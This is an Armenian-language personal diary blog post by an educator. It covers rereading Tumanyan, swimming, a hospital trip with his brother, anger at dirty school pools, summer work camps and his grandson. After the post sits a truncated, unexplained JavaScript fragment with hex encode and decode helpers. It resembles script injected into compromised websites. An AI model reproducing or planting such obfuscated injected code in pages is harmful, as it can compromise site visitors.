Ես նորից Թումանյան եմ կարդում. հենց հիմա իմ դարակից վերցրի հատորյակը՝ մակագրությամբ իմ, որ նվիրել եմ Արմինե Աբրահամյանին, ու թերթում եմ՝ ետ ու առաջ, թերթում եմ, զրուցում… Կարոտել եմ… «Մեռնել-քնել». ինչո՞ւ կանգնեցի այս չորս տողի վրա, ու թվաց՝ առաջին անգամ եմ կարդում «Դերասան Ադամյանի մահը»…

Մեռավ-քնեց, հանգստացավ.
Որպես աղմուկ կենդանության,
Մեռելության միջից անցավ
Եվ չքացավ հավիտյան:

Իրիկունը Գեղարվեստում՝ լողավազանում, Գևորգ Հակոբյանի հետ մեր ամենակարևոր մանկավարժական զրույց-առերեսում-համաձայնությունն է կայանում. ուրիշ որտե՞ղ, երբ Գևորգը տարված է Ավագ դպրոցի մուտքի ճամբարի ուսումնական քննարկումներով. նախապատրաստում է իրեն բնորոշ խորությամբ, պատանու առաջ պատասխանատվությամբ շատ ժամանակ է հատկացնում ամեն մի քննարկմանը, կարդում նորից, վերադառնում, առաջարկում կարդալ։ Իրիկնային լողից հետո ես պատրաստ էի Գևորգի՝ սիրալիր ինձ տրամադրած հեծանվով փախչելու, իրիկունն անցկացնելու ինքս ինձ հետ…

Ու իջավ նորից էնտեղ հանգչելու _
Խոր, արարչական հանգիստն անխռով,
Էնտեղ հանգչելու, էնտեղ շնչելու
Էն մեծ խոհերով, էն անվերջ սիրով…

Բայց ես պարտավոր էի ճանապարհս թեքել հիվանդանոց՝ իմ եղբոր հետևից, որ հետո, իրիկունն ուշ, իմ Արամ եղբոր հետ շտապօգնության մեքենայի ետևից մի հիվանդանոցից շարժվեմ մի այլ հիվանդանոց… Մինչև հանգչելը՝ քնել-մեռնելը… Եվ չէի էլ կասկածում, որ իմ սեր-լողի ու այս պարտականության արանքում հասցնելու եմ նորից լինել Դպրոց-պարտեզում ու… Չլինեի՜:

Դասավանդողների ամառային դպրոց Դպրոց-պարտեզում:

Ինձ մի՛ զայրացրեք, ես ուրիշ մարդ եմ դառնում, երբ ինձ զայրացնում եք. հեշտ է հաշվել՝ երբ ու ո՜նց է դա լինում՝ երբ կա անհոգի վերաբերմունք գործի նկատմամբ, երբ համակված չեք ձեր գործով, ու երբ հերթապահ-արհեստական է ձեր վերաբերմունքը… Դպրոց-պարտեզի բացօթյա երկու ավազանները՝ ծովերը մեծ ու փոքր, կեղտոտ էին. էկոլոգիական-մանկավարժական-հումանիտար աղե՜տ, ու ես խուլ եմ, միայն ցասո՛ւմ անխնա՝ աղետի բոլոր մասնակիցների նկատմամբ… Հիմա, առտու յոթին, նոր-նոր ազատվում եմ զայրույթի տիղմից, զուլալվում, որ սկսեմ իմ օրը. գուցե հենց դրա համար եմ գրում, որ ազատվեմ տիղմից-զուլալվեմ, որ սկսեմ նորից:

Կովկասի ամպած երկինքը պարզեց,
Հեռու հարավում շողակի նման
Հսկա Մասիսի գագաթը փայլեց՝
Վիթխարի Կազբեկ սարի հանդիման։

Ինձ թողնես, միայն Դավիթ Բլեյանի մասին կգրեմ… Լինեմ հետը, թափառեմ, լողամ, դժվարություններ հաղթահարեմ ու գրեմ այս մեծացող ժառանգի պատմությունը…

Պանդուխտ եմ, քույրի՛կ, մանուկ օրերից.
Գընում եմ դեպի մի անհայտ երկիր՝
Կըտրված կյանքի ամեն կապերից,
Մենակ, տարագիր…

«Էս էն տունն է», լողափային պոդիում, խաղեր, լող. 6 տարեկանների «Հունիսիկ» նախագիծն է Գեղարվեստում:

Տղայք ու տղոց կրթությունն ինձ ավելի են զբաղեցնում. միշտ այն համոզմունքին եմ եղել, որ Արամ պապի Շամխալբեկի ժառանգների մեջ կանայք ավելի երևելի են եղել, նշանակալի, քան տղաները… Փոխել է պետք այս ոչ նորմալ ընթացքը… Ահա ինչու՝ որպես ծրագրային լո՜ւրջ ներդրում ընդունեցի այն լուրը, որ Տաթև աղջիկս տղա ժառանգ է ունենալու… Խոշոր բեկում. իմ թոռներն էլ 3+1 կդառնան, ինչպես զավակներս են։ Ահա ինչու՝ երկրագործությամբ կրթահամալիրում ես զբաղվում եմ անմիջական, որպես ուղիղ ճանապարհ… Ահա ինչու՝ Ավագ դպրոցի պատանու՝ իր գործը, իր սիրած զբաղմունքը ճանաչելը, դրանով զբաղվելու խնդիրն է Ավագ դպրոցի մուտքի ճամբարի առանցքում… Ահա ինչու՝ Քոլեջն ու Ավագ դպրոցը մենք դիտարկում ենք նույն բաց, մասնագիտական կրթության հարթակում, և հիմա ինձ ավելի զբաղեցնում է Քոլեջի 2016-2017 ուսումնական տարվա ընդունելությունը։ Ահա ինչու՝ 2017-ին տիեզերագիտական միջազգային ճամբար գնալու իրավունքը ձեռք կբերեն միայն պատանեկան աշխատանքային ճամբարում աշխատանքով։ Ի՜նչ տղամարդ, եթե քո ճանապարհը երկրագործությունը չէ՝ քո սիրելի զբաղմունքով երկիր ստեղծելը… Էլ ինչի՞ ես փափախդ դրել գլխիդ…

Բայց ես շտապում եմ. ցաքուցրիվ իմ գիրը պիտի ավարտեմ, 8-ից 8։30 ես չեմ կարող չլինել Սեբաստացի ագարակում՝ աշխատանքային ճամբարի տղաների ու նրանց օղակում՝ Գեղարվեստի աշխատանքային ճամբարի աղջիկների մոտ։ Երկրագործությունն է իմ ջանքերի հունիս-հուլիսի բովանդակությունը, այստեղից էլ՝ այն մեծ ուշադրությունը, որ մենք սկսել ենք դարձնել հնգամարտին, եռամարտին, Սևանի «Ժայռ»-ին՝ իր ռազմամարզականով, արկածներով, արշավախմբային իրական կյանքով, իրական բնապահպանական գործունեությամբ՝ Սևանի ու Սևանի ափի մաքրմամբ՝ որպես դեռահաս պատանիների երկրագործություն…

Գյուղացիական տնտեսությունը օրեցօր բարեկարգվում է: Այսօր:

Հետաքրքիր է՝ ինչպիսին կլինի ավագ դպրոցի ուսումնական ճամբարի սևանյան փուլը, որ սկսվում է հուլիսի մեկից… Կմեկնի՞ իր նպատակի ետևից «Ժայռ» Գևորգ Հակոբյանը…

Դավիթ Բլեյանն սկսել է զբաղվել ինքնանկարչությամբ. գրիչով իր մարմինը նկարել է, ու ես առավոտ շուտ պիտի Դավիթ Բլեյանին իր նկարչությունից լողով մաքրեմ…
— Ինչո՞ւ տուտուզիկիդ վրա էլ չես նկարում, Դավիթ…
Ու մենք բա՜րձր ծիծաղում ենք…

Լուսանկարների հեղինակ, ֆոտոխմբագիր՝ Արմինե Թոփչյան
# 717

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Թողնել պատասխան

Ձեր էլ-փոստի հասցեն չի հրապարակվելու։ Պարտադիր դաշտերը նշված են *-ով

Explore More

Օրագիր. գրի՛ր օրը

Մարդը գոյություն ունի այնքանով, որքանով իրեն դրսևորում է։ Ժան Պոլ Սարտր Եվ քանի որ, ըստ Նունե Մովսիսյանի բլոգի, ֆրանսիացի իմ լավ բարեկամ Ժան Պոլ Սարտրը ծնվել է հենց այսօր. իրենով

Բախեցեք, և կբացվի. ասված է…

«Կոնդի առանձնատների տնտեսություն»  ոչ առևտրային պետական կազմակերպության կառավարումն իրականացնող լիազորված պետական մարմնի իրավասությունները անցնեն ՀՀ կառավարության աշխատակազմին… Նորից կարդացեք հրապարակումը։ Կոնդի առանձնատները, այն ինչ մնացել է և կոչվում է Երևան՝

Դավիթ Բլեյանի ուսումնական սեպտեմբերին մնաց․․․ 20 օր․․․ Պահո՜, պահո՜․․․ կհասցնե՞նք

Օգոստոսի 30-ին Դավիթ Բլեյանը, որպես սեբաստացի, իր համար նոր կրթական ծրագրով՝ 5 տարեկանների ուսուցում, խուրջինով, հեղինակային ծրագրով որոշված ուսումնական այլ հանդերձանքով-պիտույքներով-գործիքներով, կսկսի 2016-2017 ուսումնական տարին իր հասակակիցների հետ Դպրոց-պարտեզում, Մարինե